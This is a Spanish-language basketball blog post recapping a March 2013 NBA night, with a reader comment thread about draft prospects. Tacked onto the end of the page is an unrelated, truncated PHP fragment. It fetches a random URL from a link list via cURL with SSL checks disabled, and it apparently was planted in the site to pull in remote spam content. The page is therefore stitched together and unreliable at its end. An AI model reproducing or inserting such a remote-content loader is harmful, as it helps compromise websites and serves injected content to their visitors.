La Crónica: San Antonio Rules

12 de March de 2013 por Simon

Jornada con 5 partidos en la NBA en la que lo más destacado fue la vuelta de Carmelo Anthony, la victoria de Spurs para reforzar su liderato ante Oklahoma y la novena victoria seguida de Denver.

San Antonio Spurs dio una buena muestra de poder y orgullo ante Oklahoma City Thunder en la noche de ayer. Si Oklahoma se llevaba la victoria de AT & T Center, los de Popovich perderían el liderato de la conferencia Oeste que no abandonaban desde hace tiempo. Tras un inicio nada esperanzador para los tejanos en el que OKC hacía y deshacía a su antojo, la reacción llegó en el segundo cuarto en el que San Antonio logró parar a Oklahoma y darle la vuelta al marcador tras llegar a ir perdiendo de más de diez puntos. Con 7 arriba al descanso, los Spurs salieron al segundo tiempo decididos a amarrar definitivamente la victoria y lograron hacer crecer la ventaja hasta los 18 puntos. Los Thunder reaccionaron tímidamente pero en ningún momenti tuvieron opción real de llevarse el partido (93-105). Sin Tony Parker, ayer no fueron ni Duncan ni Ginobili los que asumieron completamente la responsabilidad en los Spurs sinó que fueron más bien los jovencitos: Splitter dio una muestra de eficiencia anotando casi todo lo que le llegaba a base de hacer las cosas lo más simple posible, Kawhi Leonard también brilló en la victoria de ayer con 17 puntos y una buena defensa sobre Kevin Durant, y Danny Green estuvo certero desde la larga distancia.

Volvía Carmelo Anthony a la acción tras su lesión de rodilla y las cosas no pudieron ir peor.  Golden State pasó  como una apisonadora por encima de los Knicks a pesar de no estar tampoco especialmente inspirados. Los Knicks desaparecieron completamente tras un buen primer cuarto. Basta con decir que acabaron el partido con un 27% de acierto en tiros de campo y un 18% desde el triple para comprobar el horrendo nivel que mostraron ayer los Knicks. En Golden State, David Lee volvió  tras su lesión y se quedó al borde del triple doble.

Denver está en un momento dulce y ayer lo demostró  llevándose la novena victoria consecutiva. La víctima fueron unos Phoenix Suns que mostraron resistencia hasta el último cuarto en el que los Nuggets metieron la marcha que le quedaba y les sacaron de rueda (108-93). Sorprendentemente el mejor anoche en Denver fue Kosta Koufos que terminó el partido con 22 puntos y 10 rebotes.  Brewer y Lawson también anotaron a buen ritmo. El único lunar para estos Nuggets en cuanto a su rendimiento es que su supuesta estrella, el italiano Danilo Gallinari sigue sin encontrar su mejor nivel y ayer firmó un pésimo porcentaje de acierto para quedarse en 5 puntos.

Philadelphia sorprendió a propios y extraños derrotando ayer a unos Brooklyn Nets que llegaban en un buen momento tras tres victorias seguidas. En el segundo cuarto, Philadelphia logró una ventaja de 7/8 puntos en el marcador que sería la que le permitiría llevar el partido controlado hasta el final. A mitad del último cuarto, Nets intentó alcanzarles pero no llegó nunca a recortar las ventajas demasiado y el partido cayó del lado local (97-106). Todos los titulares de los Sixers rindieron ayer a un gran nivel anotando en dobles dígitos, sobre todo Spencer Hawes que terminó el partido con 24 puntos, 10 rebotes y 7 asistencias. En los Nets, Deron anotó su punto 10.000 en su carrera pero su gran partido fue estéril.

Los Jazz lograron la victoria ante Detroit tras varias derrotas seguidas.  Al Jefferson y Mo Williams jugaron a un buen nivel entre los titulares pero realmente la victoria vino de la mano del banquillo que fue el que consiguió las ventajas para el equipo mormón siempre que salían a cancha. Detroit tuvo a 6 jugadores en dobles dígitos pero no supieron negociar bien el último cuarto lo que les dejó sin opciones (90-103). Brandon Knight sigue con su momento negro: tras ser arrollado por DeAndre Jordan el fin de semana, ayer se lesionó en los primeros instantes de partido en un contraataque que terminó con una fuerte torcedura de tobillo para el base.

PREMIOS

MVP: Perfectamente podría ser también la sorpresa del día porque no es muy habitual que Spencer Hawes se quede a sólo 3 asistencias del triple-doble. Exactamente fueron 27 puntos, 10 rebotes, 7 asistencias y 2 tapones.

Rookie: Chris Copeland fue de los pocos jugadores de los Knicks que merecen ser salvados tras su terrible partido de anoche. Anotó 15 puntos y capturó 6 rebotes.

Sorpresa: El mejor de los Nuggets anoche fue Kosta Koufos. En un equipo con tantos anotadores compulsivos es bien extraño que el griego anote 22 puntos. También podemos destacar el partido del matador Jeremy Evans que en 24 minutos anotó 8 puntos, cogió 7 rebotes, repartió 5 asistencias y puso un par de gorros, o el de Hamed Haddadi que en ausencia de Marcin Gortat disfruta de minutos. Ante los Nuggets anotó 13 puntos y capturó 8 rebotes.

Decepción: El nivel de Jarrett Jack en estos últimos partidos sigue siendo deplorable. Ayer, en un partido placido, anotó 4 puntos y perdió 4 balones.

Esfuerzo en vano: El mejor jugador del día no pudo llevarse la victoria. Deron Williams sucumbió ante el juego coral de los Sixers a pesar de sus 27 puntos, 13 asistencias y 6 rebotes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. GreenPride dice:
    #1

    De anoche vi el Spurs-Thunder. Todo parecía encaminado a que sin Parker era el partido del relevo en lo alto del Oeste y en el que OKC tomaría el primer puesto de la conferencia. Nada más lejos de la realidad. Si bien en el primer cuarto pareció que sería así luego los tiradores de los Spurs empezaron a enchufar y Splitter machacó a los interiores de los Thunder ¿De verdad Ibaka-Perkins es una gran pareja defensiva? Ayer desde luego no lo parecieron y Splitter dominó de una manera que hizo recordad a sus tiempos en la ACB. Por los Thunder, más allá de Durant-Westbrook poco que echarse a la boca exceptuando a Ibaka. Sigo sin ver finos a los Thunder de cara a los PO con un ataque demasiado basado en el 1×1 de sus dos estrellas. Poco movimiento de balón y pocos bloqueos para intentar liberar algo a sus dos grandes espadas y que puedan lanzar menos forzados. San Antonio se afianza en lo alto del Oeste.
    Mientras en el resto de la jornada, los Jazz anuncian que no van a dejar su puesto de PO a los Lakers tan fácilmente y que están dispuestos a luchar al igual que los Warriors.
    Llama la atención este resultado con los Knicks anotando sólo 63 puntos a pesar de la vuelta de Melo. Atención a Nueva York que está perdiendo fuelle en esta parte final de la temporada y tiene encima a los Pacers y no tan lejos al resto de equipos de PO del Este.
    Y precisamente entre esos equipos la derrota de los Nets pone esa parte de la clasificación al rojo con 5 equipos separados por 3 partidos para luchar por los puestos 4-8 de los PO.
    Y Denver continua su ascensión imparable en busca de Grizzlies y Clippers por la ventaja campo en primera ronda….

      Citar

  2. Denise dice:
    #2

    ¿Cómo va la March Madness? ¿Donde hay un escolta anotador en condiciones para que sea elegido por Orlando?….

      Citar

  3. Jose Luis dice:
    #3

    Quizá Shabazz Muhammad, a mí me encanta. Ben McLemore también me gusta mucho. Quizá Muhammad sea más alero, pero no es muy alto, aunque va muy bien al poste. McLemore es más liviano, Muhammad está más fuerte. La diferencia es de 3 cm entre ambos a favor de Muhammad.

    Luego está Oladipo, más defensivo, pero creo que Orlando eligirá bien alto y será uno de estos. O, en todo caso, un alero que sería Otto Porter.

      Citar

  4. Denise dice:
    #4

    Jose Luis: Quizá Shabazz Muhammad, a mí me encanta. Ben McLemore también me gusta mucho. Quizá Muhammad sea más alero, pero no es muy alto, aunque va muy bien al poste. McLemore es más liviano, Muhammad está más fuerte. La diferencia es de 3 cm entre ambos a favor de Muhammad. Luego está Oladipo, más defensivo, pero creo que Orlando eligirá bien alto y será uno de estos. O, en todo caso, un alero que sería Otto Porter.

    Ok, tio, Leyendo los mocks, Tambien hay un tal Marcus Smart, por ahí, no?

    Orlando necesita un 2 anotador, y si me apuras un combo-guard que pueda hacer de base-escolta a lo Tyreke Evans ó Brandon Knight .

      Citar

  5. Esteban dice:
    #5

    Denise: Ok, tio, Leyendo los mocks, Tambien hay un tal Marcus Smart, por ahí, no?

    Orlando necesita un 2 anotador, y si me apuras un combo-guard que pueda hacer de base-escolta a lo Tyreke Evans ó Brandon Knight .

    denise, depende donde caida el pick de orlando, si es el numero 1, todos coinciden en que mclemore es el gran candidato

    y de ahi para abajo se vera que puede cojer, no los veo interesados en noel con la campaña de vucevic y tampoco me parece que necesiten algun 3/4, estilo zeller, bennet etc, asi que estara entre smat o muhammad

    sobre este ultimo es muy dificil apostar, es algo parecido a fredette, morrison o redick, es decir, tios que se tiran la vida con los chavales y anotan mucho pero que hay algunas dudad si tienen potencial de estrella en la liga yt claramente no es un jugador de rol
    redick supo reinventarse aprendiendo a defender y a tomar solo tiros “buenos”, morrison nunca pudo hacerlo y fredette aun esta en veremos
    muhammad en el mcdonals pasados, se fue hasta los 35 puntos si no me equivoco, pero no le veo haciendo eso en la nba

      Citar

  6. Denise dice:
    #6

    Ya, Esteban, es que Orlando va a ir por un 2 anotador a no ser que hubiera un pivot monstruosamente bueno, Orlando no está interesado en jugadores altos, es más, se rumorea que van a traspasar a Glen Davis ya que están bastante contentos con el trío Harris-Nicholson-Vucevic. Aunque personalemnte, Glen davis me gusta, y ahora está siguiendo una dieta vegana por lo que en teoría debería reaparecer más fino la temporada que viene.

      Citar

  7. txusma dice:
    #7

    Jose Luis:
    Quizá Shabazz Muhammad, a mí me encanta. Ben McLemore también me gusta mucho. Quizá Muhammad sea más alero, pero no es muy alto, aunque va muy bien al poste.McLemore es más liviano, Muhammad está más fuerte. La diferencia es de 3 cm entre ambos a favor de Muhammad.

    Luego está Oladipo, más defensivo, pero creo que Orlando eligirá bien alto y será uno de estos. O, en todo caso, un alero que sería Otto Porter.

    José Luis, podemos hablar de negocios? Algo así como unos artículos sobre los jovenzuelos que vienen o sobre el seguimiento de la March Madness q está a punto de empezar?
    Hablamos por correo?

    (Vaya jeta que tenemos…)

      Citar

  8. Jose Luis dice:
    #8

    jajajajaja si yo no tengo ni idea, lo que sé es de los draft que se suben a nba2k13 y del mock draft de espn xD

    Lo que pedía Denise era fácil, por eso he sabido responderle jajajaja

    @Esteban Muhammad también sabe ir al poste, es fuerte, no es liviano como Morrison, Redick, Fredette: 102 kg en 1,98 cm están bien compensados. Es atlético y penetrador, sabe volcarla en tráfico y su tiro exterior no es su fuerte. Yo le comparo más con con un estilo Harden, aunque quizá no de tanto nivel.

      Citar

  9. safd dice:
    #9

    A ver, a McLemore es un tirador de la ostia y muy atletico, pero no es una supersuperestrella, seria la mejor incorporacion posible para los Wolves creo yo… pero los Magic han decidido que les va a venir mejor Smart y ya dicen que es a por quien van a ir seguro.

    en este draft no hay ninguna supersuperestrella, pero si hay muchos jugadores que serian segundas o terceras espadas buenisimas, y ningun mockdraft sera fiable hasta que se sepan las posiciones reales de los equipos en el draft.

    Y en cuanto a Muhammad, no creo que vaya a tener problemas para adaptarse a la NBA, no tiene nada que ver con reddick y demas

    Denise:
    ¿Cómo va la March Madness? ¿Donde hay un escolta anotador en condiciones para que sea elegido por Orlando?….

    empieza la semana que viene

      Citar

  10. Esteban dice:
    #10

    hablando de draft y superestrellas, anthony davis sigue pareciendo una?

    a ver, en todo este año no ha mejorado su fisico en lo mas minimo, y sus coordinaciones al hacer movimientos defensivos con el balon siguen dando mucho que desear

    a ver, sigue siendo un taponador de elite, lo que solo mejorara con el tiempo
    un buen rebotero
    sabe rolar y buscar el alley up

    pero para ser una SUPER ESTRELLA sigue careciendo de movimientos al poste, definiciones, amagos, up and under, etc y su fisico no parece que se vaya a transformar en el garnett

    veremos, pero hablar de quien sera o no una super estrella es muy complicado

      Citar

  11. Denise dice:
    #11

    Esteban:
    hablando de draft y superestrellas, anthony davis sigue pareciendo una?

    a ver, en todo este año no ha mejorado su fisico en lo mas minimo, y sus coordinaciones al hacer movimientos defensivos con el balon siguen dando mucho que desear

    a ver, sigue siendo un taponador de elite, lo que solo mejorara con el tiempo
    un buen rebotero
    sabe rolar y buscar el alley up

    pero para ser una SUPER ESTRELLA sigue careciendo de movimientos al poste, definiciones, amagos, up and under, etc y su fisico no parece que se vaya a transformar en el garnett

    veremos, pero hablar de quien sera o no una super estrella es muy complicado

    Es joven y logicamente irá progresando, pero a mi no termina de convencerme. Yo no creo que vaya a ser mejor que Chris Bosh o Lamarcus Aldridge. Y por supuesto, menos que Duncan o Garnett.
    Es más, de este Draft, creo que Lillard y Drummond van a hacer mejores carreras que él.

      Citar

  12. Jose Luis dice:
    #12

    Muy de acuerdo con Denise punto por punto

      Citar

  13. Esteban dice:
    #13

    quiza diste en la tecla denise, un bosh o aldrigue podria ser, tiene fisico similar al de estos dos

    pero en ofensiva, lo veo algo incoordinado para ser dominante, cuando vi la final de la NCAA vi algo parecido a camby o a kenyonj martin en el, y nunca estos dos se han caracterizado por ser jugadores ofensivos, vale sera un centro o ala pivote titular, legitimo e importante para cualquier equipo, pero de ahi a ser un MVP o llevar a lo duncan un equipo al titulo, no se le ve para nada

    digo esto, ya que se hablaba de que davis era una super estrella y se lo comparaba con ewing antes del draft

    el año anterior, irving no era considerado un all-star, quiza era el menos malo de una pesima camada (williams en el dos lo dice todo), y se ha destapado totalmente y ha superado todas y todas las expectativas

      Citar

  14. rumbero dice:
    #14

    Abucheos para Howard cada vez que toca una, él que se pica y empieza a comerse a los Magic, comienzan con el Hack a Howard y festival de tiros libres por su parte.
    Primer partido que veo de T. Harris. ¿Va en serio lo de este tio o no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>